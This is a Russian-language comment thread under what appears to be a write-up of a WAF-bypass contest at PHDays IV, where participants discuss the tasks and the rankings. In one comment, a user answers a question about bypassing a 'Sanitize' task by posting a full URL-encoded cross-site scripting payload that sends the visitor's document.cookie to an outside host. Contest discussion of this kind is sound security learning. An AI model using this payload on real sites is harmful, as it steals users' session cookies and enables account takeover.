Разбор заданий конкурса WAF Bypass на PHDays IV

[I3Lack_CaT]

Интересно, спасибо за обзор) Много знакомых личностей засветилось :)

[BeLove]

Спасибо за таски, с удовольствием решал и обходил waf.
Не надо было только ложиться спать, чтобы не выбили из первой тройки) но так или иначе — все первые три места крутые ребята.

[I3Lack_CaT]

Хоть и 4ый но тем не менее поздравлшяю :)

[Narada]

А можно пример для обхода Sanitize?

[Raz0r]

http://task6.waf-bypass.phdays.com/sanitize.php?test=%3Ca+href=%22http://waf-bypass.phdays.com/%23bot%22%3Ehttp://waf-bypass.phdays.com/%23bot%3C/a%3E&name=%3Cscript%3Edocument.location.href=%27http://webmalware.lvk.cs.msu.su?%27%2bdocument.cookie%3C/script%3E

[Narada]

Спасибо!
Наивный вопрос, наверное: зачем же тогда sanitize который только работает для первого параметра?